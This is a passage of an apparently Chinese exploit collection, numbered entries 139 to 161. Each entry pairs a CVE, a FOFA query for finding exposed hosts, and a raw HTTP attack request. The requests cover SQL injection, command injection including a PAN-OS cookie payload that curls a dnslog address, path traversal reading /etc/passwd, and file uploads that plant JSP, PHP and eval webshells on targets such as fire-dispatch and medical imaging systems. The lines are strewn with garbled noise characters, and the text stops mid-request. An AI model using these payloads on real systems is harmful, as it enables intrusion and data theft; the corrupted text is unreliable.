% }. n) J% A( O! z4 \/ Q7 T7 @
* T d) x0 g/ x4 U' G139. 福建科立讯通信指挥调度平台editemedia.php sql注入
0 h- K) F3 e J0 U5 O" {# A" fCVE-2024-26227 m7 h# n5 W8 o. E
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& I7 `* W& q; j
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
$ ^ x/ l9 C$ x2 G8 HHost: x.x.x.x
0 l9 W( G" E, Y) N2 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ {+ ^ t6 _8 S* v$ G9 }4 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; T. H, e: Z5 \" H8 l( g" f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& {. ^6 c$ h# `" \6 f6 h: |# ?Accept-Encoding: gzip, deflate, br" |! w+ \& l: a' l% j
Connection: close) D+ Y5 ~. {, Q
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk$ U! P/ r: h# k
Upgrade-Insecure-Requests: 10 b* l5 I5 e/ e: [7 D6 X8 I/ |
( t6 m+ E& G, Y( a
+ t0 t, d W' `' T6 u' l/ f1 i+ W
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 h- I4 b9 w1 k) o2 `; |6 Z/ M6 u
CVE-2024-2566$ k1 w; C# Q) T; c
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 v0 E1 O/ C- p# n: b8 E; WGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
7 o( o1 W. G4 }% V; t. J9 [% H% {# jHost: x.x.x.x
- X" Z! F9 y8 X9 q# g6 ~' h0 K4 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; G" \+ [" ], [9 R; WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- A) P9 N2 y {' rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- ~ w) x9 s/ S) r
Accept-Encoding: gzip, deflate, br
5 k4 N: e5 _ a) l, |& n; u2 n3 FConnection: close
- d/ P O' w; j1 G( C( hCookie: authcode=h8g9
; O) P6 o0 y. s: l; NUpgrade-Insecure-Requests: 1' N; o6 p3 I* ]: Y; |: E; s
5 K; o% T/ n( _! x
; g/ f4 D7 t* M9 E2 u& X1 H141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入$ N7 O l2 h+ ]% S; v" ~0 R
FOFA:body="指挥调度管理平台"5 q- c9 F; z) J
POST /app/ext/ajax_users.php HTTP/1.1
+ m& ~' N6 u" w+ UHost: your-ip
' l" v1 S0 [% c# h8 vUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, J k4 ~2 b6 R6 w5 w0 ^% [# n
Content-Type: application/x-www-form-urlencoded
- y a5 N$ D7 \% h& _! ~$ {4 Q
% T" L! C' f# L" |( G/ e4 C- _7 d2 i& S' ?: V) |
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
/ N" n& J8 |( K/ q1 f: L% ]- Y2 L/ q) Z/ o
, t8 I( A0 Y) ~5 N
142. CMSV6车辆监控平台系统中存在弱密码
# q: k% j+ H% b: N! hCVE-2024-29666" ]1 Y! Z& Y2 G- H4 y
FOFA:body="/808gps/", ^! h! H; [' p5 c. Q: g+ X, l/ H
admin/admin- s# U$ R& ]5 z1 p Q
143. Netis WF2780 v2.1.40144 远程命令执行5 H# M; s% n; t) `( U
CVE-2024-25850( {4 ?. }7 G: Z. \- q; `/ Q& k3 z- `
FOFA:title='AP setup' && header='netis'5 M! Y8 @4 O$ H* R3 ^
PAYLOAD6 Y/ e; z4 B/ J1 M: N% X
& g1 a* D3 N+ @! X
144. D-Link nas_sharing.cgi 命令注入
' |3 P4 \) W; I! P6 ]4 t/ xFOFA:app="D_Link-DNS-ShareCenter"
' y: }+ F* v0 h. P7 |% T3 msystem参数用于传要执行的命令
9 L& o) x; a; NGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# F/ E! K$ k7 e5 x6 ]Host: x.x.x.x) N/ s! S/ \; M! F) a& y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0% x( P/ l* j1 J. @4 s4 j( L L
Connection: close6 G4 ~( p9 z4 ?
Accept: */*
6 z9 o: E4 j- ~. CAccept-Language: en6 K. k2 T( Z5 e3 q8 B. t1 O! _+ \
Accept-Encoding: gzip
1 y% ^: L }' a+ ^
- a+ G# x. O9 \/ C% n
" w- c- h1 l9 B# {* ?6 x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
: Y' F+ f. c8 A0 H0 hCVE-2024-3400: h% H, f( _/ k
FOFA:icon_hash="-631559155"# w3 U! M3 W& H' f$ L. U
GET /global-protect/login.esp HTTP/1.1$ J* U: Z7 ?4 S7 i! T8 k* S
Host: 192.168.30.112:1005
- f0 {" d) @: c {) X7 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 e; t a: x, VConnection: close
X. J0 l% V' r) lCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
4 |' N6 C4 v2 n# a0 g$ |( w1 rAccept-Encoding: gzip
3 C, \# f6 J4 N6 d1 {, [
+ T0 r/ F3 c: p! z" N$ s
- |% x: g8 r. y9 D: y+ K146. MajorDoMo thumb.php 未授权远程代码执行5 x" q1 T$ a* G( G; A. o7 _
CNVD-2024-021754 l6 Z; R m. y$ e4 T0 R7 z
FOFA:app="MajordomoSL" F$ n: I" q7 y, }4 b. R
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
( U5 }) {) W3 W0 i- ~ t: I/ `Host: x.x.x.x
2 E8 _/ |1 Z# y/ l+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
- L# s$ k6 h6 HAccept-Charset: utf-8
. m, r/ x. ?" ?* x; aAccept-Encoding: gzip, deflate; v5 ]2 O/ U: x' l+ \6 x) Y- Y. ]
Connection: close) C1 Y: ]) f' A2 n$ i
2 c; \, n2 ]8 S5 l
3 s! @ J( T8 p4 G
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 Y9 i) M: R* {8 U5 MCVE-2024-32399
* ]+ ` D- D: o! }; J* X5 LFOFA:body="RaidenMAILD"
0 S N, f1 o( {. x1 @0 EGET /webeditor/../../../windows/win.ini HTTP/1.1
$ J# m# l1 |8 G0 L" X2 pHost: 127.0.0.1:81- A/ X5 t" E; u& ^+ m6 Z) \
Cache-Control: max-age=0
2 R8 y) V0 s$ B6 _. hConnection: close8 `) m7 u9 `) `9 J% }, K# l
" [* P. k5 U9 V \. ~
0 X( J+ Q7 O; d" r8 @3 f# b1 L148. CrushFTP 认证绕过模板注入 j7 v5 N: h4 I; i+ B; N8 q
CVE-2024-40407 _! ]( t0 j7 S
FOFA:body="CrushFTP"
4 B8 i, [# Q' V5 ^ W& hPAYLOAD
7 i5 T- ]+ x( j8 k/ f! T- `$ ]+ C, {' Q( ^+ A0 k2 }
149. AJ-Report开源数据大屏存在远程命令执行
$ I7 f2 u$ `5 h3 MFOFA:title="AJ-Report", j; L: t5 z7 J$ }; D- c
! z, U/ A5 w h- G
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ x0 m: {7 i Z$ M
Host: x.x.x.x
2 Q5 {" N6 T0 ?4 s3 a+ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 B: i' V; `8 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 i/ \7 b& G" W; N! g
Accept-Encoding: gzip, deflate, br
$ y& p5 @/ y$ s) i1 Z# \" NAccept-Language: zh-CN,zh;q=0.9: m1 h: i. b5 J
Content-Type: application/json;charset=UTF-8& H, d: v! e, _+ F3 g
Connection: close
3 i: t$ ^9 D4 f
# D* `+ I% T; Y% d9 }4 T2 {{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
' |( c2 g: r% U1 [# V4 u" Q* H, s/ ]4 m1 ?, D8 Q9 X- Q( D% ^; b1 b: ~# Q
150. AJ-Report 1.4.0 认证绕过与远程代码执行1 u: I! r' ?4 A
FOFA:title="AJ-Report"2 l: X3 Q: y! ^" R" H
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 w. j2 i; @5 _, h
Host: x.x.x.x
+ f$ O9 ?' s3 i$ E- Z$ V: Y% }2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 P' r0 O/ G% w0 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, E- G3 L" E1 S$ |( o. QAccept-Encoding: gzip, deflate, br, n$ w% e+ M: L0 m+ k5 Z
Accept-Language: zh-CN,zh;q=0.9! O7 b: y4 A% g; d) h, |0 U. I
Content-Type: application/json;charset=UTF-83 l, q/ }8 n2 ^5 H% p3 P1 L7 |' M
Connection: close: ]/ U% q0 w$ A1 \
Content-Length: 339
% w& l9 M j0 N( ^) ~# I6 a+ V4 m' y5 j9 X* C4 P% _
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
" {8 G8 N' t: p+ i# p N9 O2 Q) U- F: E% Q3 E+ q) }5 O* `
+ }$ }+ K) g' C% e: S4 {) A0 K3 s
151. AJ-Report 1.4.1 pageList sql注入
: k, j( z. k3 h1 A% HFOFA:title="AJ-Report"
% V# I. t! C; W! C. c0 j+ ~GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.17 |. F9 s. p! n. E0 R4 v
Host: x.x.x.x
* `" n, X# \+ g! y/ N4 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; D1 [7 @6 ~4 ZConnection: close8 t6 T/ T8 @) W0 U
Accept-Encoding: gzip8 k2 K8 |. E( L5 n, p9 ~- q
$ q$ r: E# k; M6 i$ A
1 C9 q! ^4 h; d% c6 S152. Progress Kemp LoadMaster 远程命令执行0 L' q! [* A! N6 d5 z8 k
CVE-2024-1212 i# H( }1 l) x
LoadMaster <= 7.2.59.2 (GA)
/ d' q# M' q, eLoadMaster<=7.2.54.8 (LTSF)
9 Q* x. j1 e' f! i# _) BLoadMaster <= 7.2.48.10 (LTS)
7 m/ ?& N3 t- t- V8 w: F/ w3 qFOFA:body="LoadMaster"3 N$ {/ e. `! v& P6 G5 O. t
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
9 D" v, |* E4 E0 BGET /access/set?param=enableapi&value=1 HTTP/1.1. r5 m& H, c) D( j# d4 _
Host: x.x.x.x
# b% U |- d" h7 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1% z9 O5 ?$ w2 O3 h/ V" i
Connection: close
: {9 x" E' [* H* }# H) i! rAccept: */*
! b: ?6 y; [, `- dAccept-Language: en
4 V8 d2 @; W" [( ]. vAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
9 J& h8 t9 z2 Y nAccept-Encoding: gzip% B9 K% a9 G8 {5 c$ Z: Z, N/ d1 i6 X
0 L# a9 b. r6 `; K8 [8 | ]( N
3 p! ~1 `3 o m( l0 U" B153. gradio任意文件读取8 [5 a& c' ~; }5 Z5 m# ~' {. n* B1 e
CVE-2024-1561FOFA:body="__gradio_mode__"2 r# G& `( Z0 h. f1 g$ t
第一步,请求/config文件获取componets的id1 U: `+ {7 ^2 K0 p9 E+ s S
http://x.x.x.x/config/ q. N; Y6 Y) @( t# v
" n7 {/ M6 ^' L# J1 M3 B! u, ~! J" `5 g. b- M7 r% }" ^
第二步,将/etc/passwd的内容写入到一个临时文件3 h' H! `: W; W
POST /component_server HTTP/1.11 {' _) O, a4 T0 d' i7 Y1 z+ d; D
Host: x.x.x.x4 }, M6 o# h a, Q& B8 L/ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3! c( Z1 \3 ^( N. ^+ s b& n7 Y
Connection: close
7 ?$ t+ D7 `" p; M o6 p! nContent-Length: 1156 ?1 b$ v% a- p7 n% n
Content-Type: application/json
6 D: O O5 F! O7 }Accept-Encoding: gzip- k9 L" q. h& i* N+ r1 N
4 P3 V* ]0 D7 E/ y* h- Z+ k
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
- y2 S+ N6 y) N Y; m0 b7 D+ | ^+ F Q. U3 W/ L
. `- u& g/ g& }: I/ f: R1 k7 F第三步访问/ Q6 m0 R0 a7 f0 y$ N
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
9 r9 N# ~$ y$ S4 e3 Z* B
2 v* ~1 E+ F9 |: N8 t: X/ l! ~5 l. I* B( P* m u
154. 天维尔消防救援作战调度平台 SQL注入
5 r) x u* g' Q; e* ~% }CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"+ k( L$ B' u8 [2 [( a w
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
) n8 F1 F5 M& | Y, x. D( XHost: x.x.x.x$ q, I9 G) v4 f3 I2 Z3 D% N
Content-Length: 106 z' t" @, x( A: o U+ j
Cache-Control: max-age=0/ X4 A( N) j) i
Upgrade-Insecure-Requests: 1
( F- W! l$ M$ {5 T) m! G# _- lOrigin: http://x.x.x.x. ^: | R7 }1 m$ x2 ~/ s1 `9 U
Content-Type: application/json
7 U* j+ x; q# r; F. K' pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) u: [/ @& }) R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 ~" w2 S6 N; v3 m$ H
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page" ^7 w3 t" t, R) K. M
Accept-Encoding: gzip, deflate
$ F4 r; S& G5 b& [, W0 i8 QAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
9 I, B, q/ {" l- D5 H! eConnection: close4 F/ }: c4 I$ p) E4 X
7 h. b2 [1 f. ?{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
7 I6 c' n, m0 d2 q5 K2 S; y e" m* ?
9 K$ Y4 l' ^/ Q! m' S9 F x1 l/ ~6 |& h) O# N
155. 六零导航页 file.php 任意文件上传0 e1 n7 L' \$ ~3 G7 k
CVE-2024-349826 Q! d Z, ^3 V
FOFA:title=="上网导航 - LyLme Spage"
- p* k4 I& l4 _4 e* J7 {POST /include/file.php HTTP/1.1
* l9 X2 f2 w8 T/ d# }! p! _Host: x.x.x.x
) s9 ]; {/ M3 V; D5 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. Y* ~, D* ~8 l9 {3 ^Connection: close" e2 w; g& i) b; k) z
Content-Length: 2322 z& x3 U( ^. l) l
Accept: application/json, text/javascript, */*; q=0.01' q7 U" @8 u# b4 q( ~, P
Accept-Encoding: gzip, deflate, br4 H" B A; b. }3 q8 i& c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- S2 v# o, K5 G5 G' g
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f$ Y$ _6 |/ j& `5 n
X-Requested-With: XMLHttpRequest/ {+ z" ~. Y# Y: \* [' J( ~
* X$ j! G2 ?' U$ m
-----------------------------qttl7vemrsold314zg0f
/ F# A& s$ h+ \& ?: I$ JContent-Disposition: form-data; name="file"; filename="test.php"
+ a: Z0 M' O& H( IContent-Type: image/png3 b* l; d. |0 z$ x2 x- s
! R8 a. U) h& C( C<?php phpinfo();unlink(__FILE__);?>! t) E) {0 c! D0 \" e' `) ]; N
-----------------------------qttl7vemrsold314zg0f--$ e6 H, j' c& S) m0 i) N/ y
- g5 y4 Q( o' M* d: J
_+ A* q2 t4 C" C6 d* Y访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php( F6 {2 b# ~" P
8 Z* H% X* H; K. O, \: c156. TBK DVR-4104/DVR-4216 操作系统命令注入. ?6 N' l j$ j: \5 w6 k* X
CVE-2024-3721
3 a6 n5 s! X4 M0 h; _. x' NFOFA:"Location: /login.rsp"/ ], m) K* z9 A) E, a
·TBK DVR-4104
# W0 M5 i" c1 Y X9 U·TBK DVR-4216
6 q) F6 N% K: a$ h0 ocurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
8 I0 Q* K+ o: o4 d
, Z! i) w. G) f! H( [& V! ^. W0 Q( x7 |3 b& M t
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- i6 @4 E2 Z) s+ \5 G) Y, UHost: x.x.x.x
3 O) k9 }" x( BUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 d9 A, m/ b5 V o# ZConnection: close
+ J" z/ `0 w% x% C/ C. pContent-Length: 0
, Y1 u+ T5 I0 P6 u; \/ }) D& ^# _Cookie: uid=1
7 f' y* e4 e+ n. q0 k" t- T0 {Accept-Encoding: gzip
2 m% r1 U( d" ]# J, u
' c! d" E% g ~- {# [" r% T) V& g& j7 i6 m% l% p
157. 美特CRM upload.jsp 任意文件上传* I- l6 I) k' j |$ E+ j3 [
CNVD-2023-06971
1 V. u9 ]) w9 } _' a X# S+ e VFOFA:body="/common/scripts/basic.js"0 h5 `& R$ A$ I. e! z5 P. X3 q
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1/ c9 U2 x+ }. m- V5 E+ b# J) G3 h
Host: x.x.x.x1 ]8 T, E1 B, L! z+ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, }6 x* I7 J. R' kContent-Length: 709
7 \4 e5 ^, T( ?' b4 U. H9 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 W5 x. V" p* i' TAccept-Encoding: gzip, deflate
. A' b* u/ _8 Q' T- G/ J4 PAccept-Language: zh-CN,zh;q=0.9" y \- R( V+ d! ^6 n! [! ~! {
Cache-Control: max-age=0
& G. [( M5 z4 Z( p' I, IConnection: close
% o' V7 ~ N* @( R8 j" J/ i) mContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
0 ^3 i0 X) h/ s+ [$ KUpgrade-Insecure-Requests: 1
' g2 _ X# R1 C m' q- g0 @3 G4 Z5 |5 j. o G1 w
------WebKitFormBoundary1imovELzPsfzp5dN
" J+ W) O$ S; P- o/ aContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 l) I0 {# I7 t' w& UContent-Type: application/octet-stream
7 V& m% A ~" A( h/ A
3 A# j; c& b9 Znyhelxrutzwhrsvsrafb& H4 \* d) @; G3 z+ _
------WebKitFormBoundary1imovELzPsfzp5dN
, J" n; O, V# D- d5 k+ w9 } `Content-Disposition: form-data; name="key"! r* e4 Z0 \4 @. ^. h U" E, |. V, A
) F( D5 @3 j( Inull* u" N1 p/ `9 G/ q3 i
------WebKitFormBoundary1imovELzPsfzp5dN( s0 W/ o/ v2 O L' U0 p) t" e
Content-Disposition: form-data; name="form"
' L0 H C, M1 |" Y7 A6 S" u# }' E
0 b9 Z4 V* w7 E. M! d9 V* ynull3 d- O" \- d$ Z1 ]
------WebKitFormBoundary1imovELzPsfzp5dN
8 S6 [+ L2 H# JContent-Disposition: form-data; name="field"
* d) d+ S+ ?8 U- | V3 n
2 L: l, G5 K3 i% N4 y4 tnull% } f* z" ]7 w b
------WebKitFormBoundary1imovELzPsfzp5dN
- x0 Y% X2 g: X2 S* f. K; FContent-Disposition: form-data; name="filetitile"
1 l; }* v* j) s9 X" l2 E0 h5 }" W! j G, d5 D* i
null+ A6 k m6 X$ v/ k
------WebKitFormBoundary1imovELzPsfzp5dN
$ S5 S* d4 p% m e7 \* FContent-Disposition: form-data; name="filefolder"3 k9 V0 \3 ^3 N) E
+ w. Q/ r7 [( a- X8 B, @null
8 z3 X7 _( Z+ a- Z( w& S$ G5 r------WebKitFormBoundary1imovELzPsfzp5dN--
1 C1 s; h" O5 t7 \0 [7 k4 ]
( o+ s# M3 ^) i, z1 T6 {
. z" [* z) z1 c# z3 `9 yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
+ m. d% Y1 k4 x" t& Z$ U, [, w! L
2 V8 L. B, ?& |$ H% ^5 ]9 a158. Mura-CMS-processAsyncObject存在SQL注入7 ]7 g4 J- ~2 V! T3 U
CVE-2024-326409 q% n6 P. F" P( R
FOFA:"Generator: Masa CMS"' U1 k- ]+ l' d: o
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.15 q; |( O a1 Z
Host: {{Hostname}}+ ^# x$ t. ^& P+ q/ V) `
Content-Type: application/x-www-form-urlencoded
# @+ W- J- a' b. A$ |" S6 ^( E9 }8 H J& H) ^3 P
object=displayregion&contenthistid=x\'&previewid=1
1 u8 d+ f; j$ D+ \$ E" d% ~' `6 }, F2 m0 U' [8 w) d
" ?) T+ n' ]0 q3 p% |
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
! @% }2 }! j0 e7 p [FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
/ i% H; G& A8 B' \0 uPOST /webservices/WebJobUpload.asmx HTTP/1.1, j3 \0 \" e2 H8 u
Host: x.x.x.x
8 v: l9 t! B1 z5 y# ?# zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
. d( {/ V* o) F8 TContent-Length: 1080
& F+ g* d% F% |$ KAccept-Encoding: gzip, deflate
: U2 t: Z& ~* V# yConnection: close2 ?$ S2 H3 O3 h; ~ `0 I
Content-Type: text/xml; charset=utf-87 G$ q/ g6 S- V8 Y
Soapaction: "http://rainier/jobUpload"
; H) `7 H3 b$ B% e2 ~! B" {, G* r
8 S O' ^3 O, X1 ]1 s( R9 g<?xml version="1.0" encoding="utf-8"?>
* r0 H! n$ O% T. d" R/ l<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* v# d: Z1 w% F' H& U0 E( A<soap:Body>) S8 e( |" Q1 n( q- v
<jobUpload xmlns="http://rainier">9 L' R$ m, ?8 [0 c) o
<vcode>1</vcode>
+ b( d7 y: J" k: ~<subFolder></subFolder>9 W {8 d: L5 ?; q0 Z% X4 @4 a
<fileName>abcrce.asmx</fileName>
- u5 b6 Y. O9 P0 y8 i<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
\& L: m5 \5 ~( N6 ]# B) w</jobUpload>- m! Y E4 ~' c" H1 A1 M
</soap:Body>0 u8 }/ X9 a/ { {8 ?& v
</soap:Envelope>8 r+ Y$ G7 N. w0 C1 m7 L* _; v
: r" w' I: ^! O2 y' k) R( i& G% o+ b
4 S T: ?& K! \& s
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")) j0 Y2 O7 z& W/ d0 _
" ~% I9 L9 m7 T' @ A
2 t* M' u: w% R160. Sonatype Nexus Repository 3目录遍历与文件读取
, ^$ W" _ ]! \+ fCVE-2024-49565 Q4 L1 Y4 t: c/ P
FOFA:title="Nexus Repository Manager"' w) E. w0 o# b& m7 `! R1 a* I2 W
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 W/ L1 ?9 d) N `- [5 I8 _Host: x.x.x.x
- k' I. u' D" _( Y& I7 Z5 a7 P: gUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
$ W# [6 G2 ` `' PConnection: close* o; D6 w9 O) S
Accept: */*
1 x i/ [3 v3 k. `Accept-Language: en. ~2 ]0 Y2 `( w. }1 }) C$ L
Accept-Encoding: gzip
* W+ I- C/ |' k% S/ d) ~2 |
) Y0 e& y: w0 k- N, A& I" L: F& W$ s* B: A7 K1 i C
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传8 A7 W' G7 k4 w; q
FOFA:body="/KT_Css/qd_defaul.css"
1 |' i& s* M7 p$ o6 g第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
' b% a! I( l/ ^: E3 EPOST /Webservice.asmx HTTP/1.11 `& L. S$ l, |" O% H# b K
Host: x.x.x.x, ]0 S+ x0 l1 c2 d, A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& L7 u/ C2 a: XConnection: close
1 O# b: |1 K G9 f. B- IContent-Length: 445% G, M; @6 P. u0 g2 ~( `) q. p. W
Content-Type: text/xml
/ o% }6 a+ o$ K3 hAccept-Encoding: gzip" J) y9 i+ b* G5 O. O% K
: y; b# H! I+ C/ z# ]& } ?, ^7 @. r<?xml version="1.0" encoding="utf-8"?>7 w; z9 b. O$ e, o; [9 B
<soap:Envelope xmlns:xsi="
8 A5 p6 ~$ G; W! whttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
